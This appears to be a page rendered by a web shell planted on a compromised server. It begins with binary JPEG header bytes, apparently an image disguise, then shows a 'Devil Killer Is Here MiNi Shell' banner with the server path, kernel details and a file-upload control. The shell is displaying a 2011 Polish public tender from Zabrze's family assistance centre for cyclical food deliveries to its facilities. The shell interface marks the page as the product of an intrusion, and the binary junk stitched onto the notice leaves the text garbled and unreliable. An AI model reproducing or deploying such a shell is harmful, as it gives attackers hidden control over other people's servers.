JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110606/157999-N-2011.html

<p class="kh_header"><b>Zabrze: Dostawa cykliczna żywności na potrzeby Miejskiego Ośrodka Pomocy Rodzinie w Zabrzu oraz projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze</b><br>
<b>Numer ogłoszenia: 157999 - 2011; data zamieszczenia: 06.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Roosevelta 40, 41-800 Zabrze, woj. śląskie, tel. 032 2777800, faks 032 2777802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.zabrze.magistrat.pl, www.mopr.zabrze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa cykliczna żywności na potrzeby Miejskiego Ośrodka Pomocy Rodzinie w Zabrzu oraz projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostarczanie żywności (CPV - 15000000-8), w tym:
1.	Pieczywa wskazanego w załączniku nr 1 do SIWZ - część 1 (CPV: 15810000-9, 15811100-7, 15811400-0, 15812000-3,) 
2.	Nabiału i tłuszczy wskazanych w załączniku nr 2 do SIWZ - część 2 (CPV: 15500000-3, 03142500-3, 15411100-3, 15431100-9, 15511210-8, 15512000-0, 15530000-2, 15541000-2, 15542100-0, 15551300-8, 15544000-3)
3.	warzyw i owoców wskazanych w załączniku nr 3 do SIWZ - część 3 (CPV: 03212100-1, 03221220-4, 03221111-7, 03221112-4, 03221113-1, 03221210-1, 03221240-0, 03221270-9, 03221260-6, 03221410-3, 03222111-4, 03222210-8, 03222220-1, 03222321-9, 15331142-4, 03221420-6, 03222240-7)
4.	wędlin i mięsa wskazanych w załączniku nr 4 do SIWZ - część 4 (CPV: 15100000-9, 15110000-2, 15131130-5, 15112000-6, 15131410-2, 15130000-8, 15131135-0, 15131134-3)
5.	artykułów spożywczych wskazanych w załączniku nr 5 do SIWZ - część 5 (CPV: 15800000-6, 15831000-2, 15841000-5, 15332240-8, 15863000-5, 15871230-5, 15871250-1, 15871260-4, 15331470-2, 15871273-8, 15872400-5, 15891400-4, 15200000-0, 15332290-3,15612100-2, 15613311-1, 15614100-6, 15872100-2, 15861000-1, 15322000-1, 15896000-5, 15220000-6, 15232000-3, 15131000-5, 15119600-1)
6.	słodyczy wskazanych w załączniku nr 6 do SIWZ - część 6 (CPV: 15842220-0, 15821200-1, 15842100-3,    15842000-2, 15820000-2)
7.	napoi wskazanych w załączniku nr 7 do SIWZ - część 7 (CPV: 15981000-8, 15981400-2, 15981200-0, 15320000-7, 15321000-4, 15322000-1)
Dostawy pieczywa przeprowadzone będą własnym transportem i na własny koszt sześć razy w tygodniu zgodnie z harmonogramem dostaw stanowiącym załącznik nr 16 do SIWZ oraz w niektórych przypadkach na podstawie indywidualnych zleceń Zamawiającego najpóźniej w terminie do 2 dni roboczych od daty wystawienia zlecenia. Dostarczane pieczywo musi być świeże.
Dostawy pieczywa przeprowadzone będą do nw placówek:
Dom Noclegowy ul. Trocera 63,
Świetlica Roosevelta ul. Roosevelta 40,
Świetlica Wyzwolenia ul. Wyzwolenia 7,
Świetlica Mikulczyce ul. Tarnopolska 57,
Świetlica Biskupice ul. Kasprowicza 7,
Świetlica Rokitnica ul. Andersa 34,
Świetlica, ul. Dworcowa 8a,
Środowiskowy Dom Samopomocy ul. Andersa 34,
Program Aktywności Lokalnej ul. Bytomska 82,
Zespół ds. Opieki nad Dzieckiem i Rodziną ul. Wyzwolenia 7,
Klub Integracji Społecznej Pl. Krakowski 4,
Doradca ds. Osób Niepełnosprawnych ul. Wyzwolenia 7, 
Dostawy żywności (część 2-7) przeprowadzone będą własnym środkiem transportu i na własny koszt do nw placówek:
Dom Noclegowy ul. Trocera 63,
Świetlica Roosevelta ul. Roosevelta 40,
Świetlica Wyzwolenia ul. Wyzwolenia 7,
Świetlica Mikulczyce ul. Tarnopolska 57,
Świetlica Biskupice ul. Kasprowicza 7,
Świetlica Rokitnica ul. Andersa 34,
Świetlica, ul. Dworcowa 8a,
Środowiskowy Dom Samopomocy ul. Andersa 34,
Program Aktywności Lokalnej ul. Bytomska 82,
Zespół ds. Opieki nad Dzieckiem i Rodziną ul. Wyzwolenia 7,
Klub Integracji Społecznej Pl. Krakowski 4,
Doradca ds. Osób Niepełnosprawnych ul. Wyzwolenia 7,
Sekretariat MOPR ul. Roosevelta 40.
Zamówienia będą realizowane częściami na podstawie indywidualnych zleceń Zamawiającego najpóźniej w terminie do 2 dni roboczych od daty wystawienia zlecenia. 
Dostawa do wszystkich świetlic przeprowadzana będzie tego samego dnia najpóźniej do godziny 17.00. Do pozostałych placówek dostawa musi być przeprowadzona najpóźniej do godziny 15.00.
Gramatura oferowanego produktu nie może być niższa niż gramatura produktu wymienionego w szczegółowym kosztorysie ofertowym. 
Dostarczane wędliny (część 4), warzywa i owoce (część 3) muszą być świeże. Nabiał i tłuszcze (część 2) muszą posiadać termin przydatności do spożycia minimum 14 dni od dnia dostawy w przypadku mleka i tłuszczy termin wynosi minimum 30 dni. Artykuły spożywcze (część 5), słodycze (część 6) i napoje (część 7) muszą posiadać termin przydatności do spożycia wynoszący minimum 6 miesięcy od dnia dostawy. Słodycze nie mogą zawierać nadzienia alkoholowego. 
Ceny poszczególnych produktów przez czas trwania umowy muszą być stałe. Zamawiający zobowiązuje się zamówić co najmniej 70% wartości przedmiotu umowy. Pozostałe 30% zostanie zamówione w zależności od potrzeb Zamawiającego. 
Termin płatności za wszystkie dostarczone artykuły - 14 dni od daty dostarczenia Zamawiającemu prawidłowo wystawionych faktur VAT.	
Na dokonanie pierwszej dostawy Wykonawca musi posiadać gotowość dostawy w terminie 2 dni od daty zawarcia umowy na podstawie zlecenia wystawionego przez Zamawiającego.
Wykonawca zobowiązany jest do wystawiania odrębnych faktur VAT na żywność określoną w zleceniach przez Zamawiającego przeznaczoną na potrzeby Programu na Rzecz Społeczności Romskiej w Polsce - Projekt Kulturalny, na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej - Grupy Wsparcia, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno- zawodowej w gminie Zabrze dla Doradcy ds. Osób Niepełnosprawnych, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Klubu Integracji Społecznej, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej. 
Zamawiający zastrzega sobie prawo do dokonania przesunięć ilościowych pomiędzy pozycjami wyszczególnionymi w załącznikach od 1 do 7 do SIWZ. Wartość dokonanych przesunięć nie może przekroczyć 5% ceny oferty wybranej w postępowaniu jako oferta najkorzystniejsza.
Żywność musi być dostarczona specjalistycznym transportem, zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 19.12.2002 r. w sprawie wymagań sanitarnych dotyczących środków transportu żywności (Dz. U. Nr 21, poz.179 z 2003 r.).
Dostarczane mięso i wyroby mięsne każdorazowo powinny pochodzić z udokumentowanego źródła i powinny spełniać wszelkie normy nałożone obowiązującymi w tym zakresie przepisami sanitarnymi i weterynaryjnymi m.in. z ustawą z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. Nr 17 poz. 127, ze zmianami); ustawą z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. nr 69, poz. 625 ze zmianami).
Produkty wytworzone będą zgodnie z Ustawą z dnia 25 sierpnia 2006 r. o warunkach zdrowotnych żywności i żywienia z późniejszymi zmianami i podległymi jej aktualnymi Rozporządzeniami i aktami wykonawczymi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9, 15.50.00.00-3, 03.21.21.00-1, 15.10.00.00-9, 15.11.00.00-2, 15.80.00.00-6, 15.82.12.00-1, 15.98.14.00-2, 15.81.00.00-9, 15.11.40.00-0, 15.81.20.00-3, 15.84.22.20-0, 15.84.21.00-3, 15.84.20.00-2, 15.82.00.00-2, 15.98.10.00-8, 15.98.14.00-2, 15.98.12.00-0, 15.32.00.00-7, 15.32.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie przedstawionego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 8  do SIWZ (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy składają łącznie) oraz dołączonych dokumentów wskazanych w  Rozdziale IV SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie przedstawionego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 8  do SIWZ (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy składają łącznie) oraz dołączonych dokumentów wskazanych w  Rozdziale IV SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie przedstawionego przez wykonawcę oświadczenia o posiadaniu specjalistycznego transportu, zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 19.12.2002r. w sprawie wymagań sanitarnych dotyczących środków transportu żywności (Dz. U. Nr 21, poz.179 z 2003r) - załącznik nr 9 do SIWZ oraz oświadczenia dotyczącego osób, które będą uczestniczyć w wykonywaniu zamówienia - załącznik nr 12 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie przedstawionego przez wykonawcę oświadczenia o posiadaniu specjalistycznego transportu, zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 19.12.2002r. w sprawie wymagań sanitarnych dotyczących środków transportu żywności (Dz. U. Nr 21, poz.179 z 2003r) - załącznik nr 9 do SIWZ oraz oświadczenia dotyczącego osób, które będą uczestniczyć w wykonywaniu zamówienia - załącznik nr 12 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie przedstawionego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 8 do SIWZ (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy składają łącznie)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>parafowany wzór umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień w zawartej umowie wprowadzonych aneksem takich jak:
- zmiana osób funkcyjnych - z przyczyn niezależnych od Zamawiającego i Wykonawcy
- zmiana sposobu reprezentacji - z przyczyn niezależnych od Zamawiającego i Wykonawcy
- zmiana adresu siedziby jednej ze stron - z przyczyn zewnętrznych
- zmiana terminu realizacji zamówienia - na podstawie obiektywnych przesłanek zaakceptowanych  
  przez Zamawiającego.
- zmiana asortymentu określonego w załącznikach 1 - 7 na podobny o zbliżonej gramaturze i tej samej jakości
- zmiana wynagrodzenia Wykonawcy w części dotyczącej podatku VAT, jeżeli w okresie realizacji umowy ulegnie zmianie w drodze ustawowej stawka podatku VAT - będąca elementem wynagrodzenia Wykonawcy.
- wprowadzenie lub zmiana podwykonawcy - w uzasadnionych przypadkach, za pisemną zgodą Zamawiającego
- zmiana miejsca dostawy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.zabrze.pl www.mopr.zabrze.magistrat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Zabrzu ul. Roosevelta 40 41-800 Zabrze pokój nr 216 - 2 piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2011 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Rodzinie w Zabrzu ul. Roosevelta 40 41-800 Zabrze pokój nr 117 - 1 piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostarczanie żywności (CPV - 15000000-8), w tym:
1.	Pieczywa wskazanego w załączniku nr 1 do SIWZ - część 1 (CPV: 15810000-9, 15811100-7, 15811400-0, 15812000-3,) 
Dostawy pieczywa przeprowadzone będą własnym transportem i na własny koszt sześć razy w tygodniu zgodnie z harmonogramem dostaw stanowiącym załącznik nr 16 do SIWZ oraz w niektórych przypadkach na podstawie indywidualnych zleceń Zamawiającego najpóźniej w terminie do 2 dni roboczych od daty wystawienia zlecenia. Dostarczane pieczywo musi być świeże.
Dostawy pieczywa przeprowadzone będą do nw placówek:
Dom Noclegowy ul. Trocera 63,
Świetlica Roosevelta ul. Roosevelta 40,
Świetlica Wyzwolenia ul. Wyzwolenia 7,
Świetlica Mikulczyce ul. Tarnopolska 57,
Świetlica Biskupice ul. Kasprowicza 7,
Świetlica Rokitnica ul. Andersa 34,
Świetlica, ul. Dworcowa 8a,
Środowiskowy Dom Samopomocy ul. Andersa 34,
Program Aktywności Lokalnej ul. Bytomska 82,
Zespół ds. Opieki nad Dzieckiem i Rodziną ul. Wyzwolenia 7,
Klub Integracji Społecznej Pl. Krakowski 4,
Doradca ds. Osób Niepełnosprawnych ul. Wyzwolenia 7, 
Gramatura oferowanego produktu nie może być niższa niż gramatura produktu wymienionego w szczegółowym kosztorysie ofertowym. Ceny poszczególnych produktów przez czas trwania umowy muszą być stałe. Zamawiający zobowiązuje się zamówić co najmniej 70% wartości przedmiotu umowy. Pozostałe 30% zostanie zamówione w zależności od potrzeb Zamawiającego. 
Termin płatności za wszystkie dostarczone artykuły - 14 dni od daty dostarczenia Zamawiającemu prawidłowo wystawionych faktur VAT.	
Na dokonanie pierwszej dostawy Wykonawca musi posiadać gotowość dostawy w terminie 2 dni od daty zawarcia umowy na podstawie zlecenia wystawionego przez Zamawiającego.
Wykonawca zobowiązany jest do wystawiania odrębnych faktur VAT na żywność określoną w zleceniach przez Zamawiającego przeznaczoną na potrzeby Programu na Rzecz Społeczności Romskiej w Polsce - Projekt Kulturalny, na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej - Grupy Wsparcia, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno- zawodowej w gminie Zabrze dla Doradcy ds. Osób Niepełnosprawnych, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Klubu Integracji Społecznej, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej. 
Zamawiający zastrzega sobie prawo do dokonania przesunięć ilościowych pomiędzy pozycjami wyszczególnionymi w załącznikach od 1 do 7 do SIWZ. Wartość dokonanych przesunięć nie może przekroczyć 5% ceny oferty wybranej w postępowaniu jako oferta najkorzystniejsza.
Żywność musi być dostarczona specjalistycznym transportem, zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 19.12.2002 r. w sprawie wymagań sanitarnych dotyczących środków transportu żywności (Dz. U. Nr 21, poz.179 z 2003 r.).
Produkty wytworzone będą zgodnie z Ustawą z dnia 25 sierpnia 2006 r. o warunkach zdrowotnych żywności i żywienia z późniejszymi zmianami i podległymi jej aktualnymi Rozporządzeniami i aktami wykonawczymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.81.11.00-7, 15.81.14.00-0, 15.81.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NABIAŁ I TŁUSZCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostarczanie żywności (CPV - 15000000-8), w tym:
2.	Nabiału i tłuszczy wskazanych w załączniku nr 2 do SIWZ - część 2 (CPV: 15500000-3, 03142500-3, 15411100-3, 15431100-9, 15511210-8, 15512000-0, 15530000-2, 15541000-2, 15542100-0, 15551300-8, 15544000-3)
Dostawy żywności (część 2-7) przeprowadzone będą własnym środkiem transportu i na własny koszt do nw placówek:
Dom Noclegowy ul. Trocera 63,
Świetlica Roosevelta ul. Roosevelta 40,
Świetlica Wyzwolenia ul. Wyzwolenia 7,
Świetlica Mikulczyce ul. Tarnopolska 57,
Świetlica Biskupice ul. Kasprowicza 7,
Świetlica Rokitnica ul. Andersa 34,
Świetlica, ul. Dworcowa 8a,
Środowiskowy Dom Samopomocy ul. Andersa 34,
Program Aktywności Lokalnej ul. Bytomska 82,
